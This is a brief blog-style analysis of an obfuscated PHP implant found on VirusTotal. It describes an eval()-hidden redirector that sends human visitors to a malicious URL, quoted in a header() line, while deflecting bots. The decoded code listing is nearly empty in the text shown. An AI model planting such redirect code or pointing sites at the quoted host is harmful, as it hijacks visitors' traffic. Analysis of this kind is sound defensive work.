Skip to main content

Analysis: PHP.dbc1bf2de89ee7dd2597697b315be084ccf86edefd9f7e2dbf430438871a3fee

An analysis of a PHP implant I came across on VirusTotal Intelligence.

 


On an initial investigation of the file, it is pretty obvious there is something funky going on. Spot the eval() right at the beginning of the code...

The decoded eval looks like this:

<?php 
}

A quick glance over the script shows it is a 'redirector', which has the intention to redirect traffic to an alternative location, in this case: header("Location: http://ibontu.25u.com/");

The script also deflects requests from bots, to prevent the bots from being redirected to the alternative site.

Crude, but effective - somewhat :/

References

VirusTotal

Obfuscated - https://www.virustotal.com/en/file/dbc1bf2de89ee7dd2597697b315be084ccf86edefd9f7e2dbf430438871a3fee/analysis/
DeObfuscated - https://www.virustotal.com/en/file/66899269383bd479b0e29a5136e496bbd8d068daf514909bf7b2f30174dac0b9/analysis